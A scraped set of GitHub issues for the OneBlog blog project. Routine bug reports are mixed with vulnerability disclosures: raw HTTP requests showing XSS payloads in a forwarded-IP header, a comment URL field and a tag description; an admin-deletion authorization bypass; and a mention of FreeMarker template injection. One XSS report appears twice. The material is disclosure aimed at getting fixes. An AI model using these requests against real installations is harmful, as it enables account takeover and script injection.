zhangyd-c / oneblog Goto Github PK

There are two XSS vulnerabilities in article reviews.

Vulnerability code:
IpUtil

public static String getRealIp(HttpServletRequest request) {
        String ip = request.getHeader("x-forwarded-for");
        return checkIp(ip) ? ip : (
                checkIp(ip = request.getHeader("Proxy-Client-IP")) ? ip : (
                        checkIp(ip = request.getHeader("WL-Proxy-Client-IP")) ? ip :
                                request.getRemoteAddr()));
}

Getting IP from x-forwarded-for without filtering.Then an XSS vulnerability will occur when the output is made.

Second places

crafted url in POST data to api/comment.There is a problem with the filtering rules.

Vulnerability code:
HtmlUtil

public static String html2Text(String content) {
        if (StringUtils.isEmpty(content)) {
            return "";
        }
        String regEx_html = "<[^>]+>";
        content = content.replaceAll(regEx_html, "").replaceAll(" ", "");
        content = content.replaceAll("&quot;", "\"")
                .replaceAll("&nbsp;", "")
                .replaceAll("&amp;", "&")
                .replaceAll("\n", " ")
                .replaceAll("&#39;", "\'")
                .replaceAll("&lt;", "<")
                .replaceAll("&gt;", ">")
                .replaceAll("[ \\f\\t\\v]{2,}", "\t");

        String regEx = "<.+?>";
        Pattern pattern = Pattern.compile(regEx);
        Matcher matcher = pattern.matcher(content);
        content = matcher.replaceAll("");
        return content.trim();
    }

Payload

POST /api/comment HTTP/1.1
Host: 127.0.0.1:8443
Content-Length: 181
Accept: /
Origin: http://127.0.0.1:8443
X-Requested-With: XMLHttpRequest
User-Agent: Chrome/77.0.3865.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
x-forwarded-for:111.111.111.111<script>alert('xss-thiscode01')</script>
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

pid=0&content=hello hello&avatar=https%3A%2F%2Fq1.qlogo.cn%2Fg%3Fb%3Dqq%26nk%3D111%26s%3D40&qq=12345&nickname=jack01&email=111%40qq.com&url=javascript:alert('xss-thiscode02');&sid=1

XSS vulnerability will be launched.

Enter the Background Comment Management List.The first XSS automatic trigger.

The second XSS click jack01 can trigger.

Ask the author to fix this vulnerability.Thanks.

博客id大于999以后，上一篇和下一篇的id错误。例如1234 会变成1,234
点击以后，后台出错

‘’‘
2019-05-19 22:32:54 [com.zyd.blog.framework.advice.ExceptionHandleController:72] ERROR - url参数异常，请检查参数类型是否匹配！
org.springframework.web.method.annotation.MethodArgumentTypeMismatchException: Failed to convert value of type 'java.lang.String' to required type 'java.lang.Long'; nested exception is java.lang.NumberFormatException: For input string: "6,873"
’‘’

‘’‘
Caused by: java.lang.NumberFormatException: For input string: "6,873"
at java.lang.NumberFormatException.forInputString(NumberFormatException.java:65)
’‘’

老哥，刚在spring4all看到你的博客，觉得还不错哦。
我看你介绍里面有三个工程，but没有blog-admin哦，是不是忘上传啦

请问freemarker用在哪些地方呢？ 有什么思路可以设置全站html静态化吗，谢谢解答

1、在后台点击发布文章，效果是新增文章并发表，但是在富文本框中带出一些其它文章的文字
2、文章发布时，标签经常无法点击，导致文章编辑好之后无法发布或者保存草稿

属于阿里云存储的鼠标来回动，页面会变黑，七牛云没事

是不是缓存？？？

您好，该项目中可能存在FreeMarker模板注入实现远程命令执行问题的风险。

在项目后台存在模板管理功能，并且可以任意修改模板。

成功修改了数据库中的模板数据。

之后前台访问url/sitemap.xml，成功触发命令执行

解决办法j
建议对修改的模块的地方进行过滤处理。

提示更新成功，但实际上是失败的，例如：
1、在系统设置中，先更新基本信息的站点简介，更新成功，再不刷新当前页面的情况下，编辑登陆下的登陆重试次数，编辑完后提交保存，提示成功，但实际上，并未成功，没有进行更新操作，但会记录修改系统配置的日志。
2、在权限管理中，角色管理，编辑角色信息提示成功，实际未成功，但会记录编辑角色配置的日志。实际执行的sql是
Preparing: UPDATE sys_role SET id = id,update_time = ? WHERE id = ?
Parameters: 2019-08-12 10:52:43.904(Timestamp), null
3、在权限管理中，资源管理，和第二个是一个问题，编辑提示成功，实际未成功
4、在用户列表中，用户列表，和第二个是一个问题，编辑提示成功，实际未成功
5、文章搬运工，封面图未转换成指定地址，依旧是原地址
6、网站管理中，更新日志中，和第二个是一个问题，编辑提示成功，实际未成功
7、网站管理中，公告管理中，和第二个是一个问题，编辑提示成功，实际未成功
8、网站管理中，友情链接中，和第二个是一个问题，编辑提示成功，实际未成功
8、网站管理中，模板管理中，和第二个是一个问题，编辑提示成功，实际未成功
9、文章管理中，文章列表中，推送到百度站长平台功能，当推送提示失败时，信息“site error”，再次点击推送按钮，提示失败，这时信息是“请至少选择一条记录”，实际上是选择了数据，应该再次提示信息“site error”
10、文章管理中，标签列表中，和第二个是一个问题，编辑提示成功，实际未成功
11、文章管理中，分类列表中，和第二个是一个问题，编辑提示成功，实际未成功
目前遇到这些问题，好像所有编辑功能有问题，是我克隆代码问题嘛？望作者回复，谢谢。
同时，感谢作者开源这么好项目。

docker 成功启动
但是浏览器无法访问 127.0.0.1:8085

CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
af7da343fe35 nginx "/docker-entrypoint.…" 12 minutes ago Up 12 minutes 0.0.0.0:8080->80/tcp, :::8080->80/tcp nginx
3804c9599f78 justauth/blog-web "java -jar app.jar -…" About an hour ago Up 45 minutes 8085/tcp, 0.0.0.0:8085->8443/tcp, :::8085->8443/tcp blog-web
e675efe0d5b8 justauth/blog-admin "java -jar app.jar -…" About an hour ago Up 45 minutes 0.0.0.0:8086->8085/tcp, :::8086->8085/tcp blog-admin
9c2e59edfd52 justauth/blog-mysql "docker-entrypoint.s…" About an hour ago Up 45 minutes (healthy) 33060/tcp, 0.0.0.0:3307->3306/tcp, :::3307->3306/tcp blog-mysql
eb33133d0abb redis "docker-entrypoint.s…" About an hour ago Up 45 minutes (healthy) 0.0.0.0:6380->6379/tcp, :::6380->6379/tcp blog-redis

Cross SIte Scripting (XSS) vulnerability exists in OneBlog- <=2.2.8. via
Access the add function in the operation tab list in the background, and then inject

[Vulnerability Type]
Cross Site Scripting (XSS)

[Vendor of Product]
https://github.com/zhangyd-c/OneBlog

[Affected Product Code Base]
OneBlog- <=2.2.8

[Affected Component]
POST /tag/add HTTP/1.1
Host: localhost:8085
Content-Length: 70
sec-ch-ua: "Chromium";v="91", " Not;A Brand";v="99"
Accept: /
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://localhost:8085
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:8085/article/tags
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: Hm_lvt_acc69acbc4e6d4c69ecf77725d072490=1628729888; Hm_lvt_cd8218cd51f800ed2b73e5751cb3f4f9=1629343346; Hm_lvt_1cd9bcbaae133f03a6eb19da6579aaba=1629683228; Hm_lvt_1040d081eea13b44d84a4af639640d51=1629783006; UM_distinctid=17b76a322159-028d8115bdecb5-3373266-e1000-17b76a32216401; CNZZDATA1255091723=2008929866-1629783007-http%253A%252F%252Flocalhost%253A8080%252F%7C1629783007; _jspxcms=5db6fb498e1443a5be36a3e370535190; _ga=GA1.1.795989054.1631684216; Hm_lvt_8b02a318fde5831da10426656a43d03c=1634114003; JSESSIONID=f0757d8a-afb9-403a-b1f2-5d7c3e3a9d00
Connection: close

id=&name=Redis&description=%3Cscript%3Ealert(%22xss%22)%3C%2Fscript%3E
[Attack Type]
Remote

[Impact Code execution]
true

2019-10-29 22:06:45 [org.apache.juli.logging.DirectJDKLog:182] ERROR - Servlet.service() for servlet [dispatcherServlet] in context with path [] threw exception [redis.clients.jedis.exceptions.JedisConnectionException: Could not get a resource from the pool] with root cause
java.net.ConnectException: Connection refused (Connection refused)
at java.net.PlainSocketImpl.socketConnect(Native Method)
at java.net.AbstractPlainSocketImpl.doConnect(AbstractPlainSocketImpl.java:350)
at java.net.AbstractPlainSocketImpl.connectToAddress(AbstractPlainSocketImpl.java:206)
at java.net.AbstractPlainSocketImpl.connect(AbstractPlainSocketImpl.java:188)
at java.net.SocksSocketImpl.connect(SocksSocketImpl.java:392)

不更新了吗

[Suggested description]
Insecure Permissions vulnerability exists in OneBlog.Low level administrators can delete high-level administrators beyond their authority (including administrators with the highest authority).

[Vulnerability Type]
Insecure Permissions

[Vendor of Product]
https://github.com/zhangyd-c/OneBlog

[Affected Product Code Base]
<= 2.2.8

[Affected Component]
POST /user/remove HTTP/1.1
Host: localhost:8086
Content-Length: 5
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="92"
Accept: /
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://localhost:8086
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:8086/users
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: navUrl=http://localhost:9105/admin/basic.action; XSRF-TOKEN=010353a5-cfe1-4fa8-9a28-0b9cfb4ca538; cms_token=c820882773ab4b6b9719916981b3e9b7; JSESSIONID=c45212ed-03a9-499c-810b-cf5c28e4d5b1
Connection: close

ids= 3（The IDS value is controllable. Any administrator can add, delete, modify and query the data of other administrator users by modifying the IDS value）

[Attack Type]
Remote

[Vulnerability details]

first, prepare two test accounts with different levels.
Senior administrator admin

Low level administrator root123

Step 2: log in to the system with root123 and enter the user management page

Step 3: click the delete button to directly delete the administrator user admin

Delete succeeded！

In addition, you can also use burpsuite to capture packets and delete any user (including yourself) by modifying the value of ids. This is a logical vulnerability because the default secondary rule of the system is that you cannot delete yourself)

The first step is to log in to the background with root123 account and enter user management.

Step 2: after the packet capturing mode is enabled, click the delete button corresponding to user test

You can delete any user by modifying the value of IDS. Here, I modify the value of IDS to the value of the currently logged in user.

Delete succeeded！

在爬取文章时，不知道哪里出现了问题，导致爬取不到文章，其内容如下，全是null

程序正在初始化...
[ hunter ] null -- null -- null
[ hunter ] [ save ] Succeed! null
[ hunter ] [ sync tags ] Succeed! null
[ hunter ] bye~~

此问题是什么引起的呢？

一个基于SpringBoot的简洁优雅的个人博客

• 项目地址：https://github.com/shaoxiongdu/blog

• 在线演示地址: http://www.shaoxiongdu.cn

• 

• 

Cross SIte Scripting (XSS) vulnerability exists in OneBlog- <=2.2.8. via
Access the add function in the operation tab list in the background, and then inject

[Vulnerability Type]
Cross Site Scripting (XSS)

[Vendor of Product]
https://github.com/zhangyd-c/OneBlog

[Affected Product Code Base]
OneBlog- <=2.2.8

[Affected Component]
POST /tag/add HTTP/1.1
Host: localhost:8085
Content-Length: 70
sec-ch-ua: "Chromium";v="91", " Not;A Brand";v="99"
Accept: /
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://localhost:8085
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:8085/article/tags
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: Hm_lvt_acc69acbc4e6d4c69ecf77725d072490=1628729888; Hm_lvt_cd8218cd51f800ed2b73e5751cb3f4f9=1629343346; Hm_lvt_1cd9bcbaae133f03a6eb19da6579aaba=1629683228; Hm_lvt_1040d081eea13b44d84a4af639640d51=1629783006; UM_distinctid=17b76a322159-028d8115bdecb5-3373266-e1000-17b76a32216401; CNZZDATA1255091723=2008929866-1629783007-http%253A%252F%252Flocalhost%253A8080%252F%7C1629783007; _jspxcms=5db6fb498e1443a5be36a3e370535190; _ga=GA1.1.795989054.1631684216; Hm_lvt_8b02a318fde5831da10426656a43d03c=1634114003; JSESSIONID=f0757d8a-afb9-403a-b1f2-5d7c3e3a9d00
Connection: close

id=&name=Redis&description=%3Cscript%3Ealert(%22xss%22)%3C%2Fscript%3E
[Attack Type]
Remote

[Impact Code execution]
true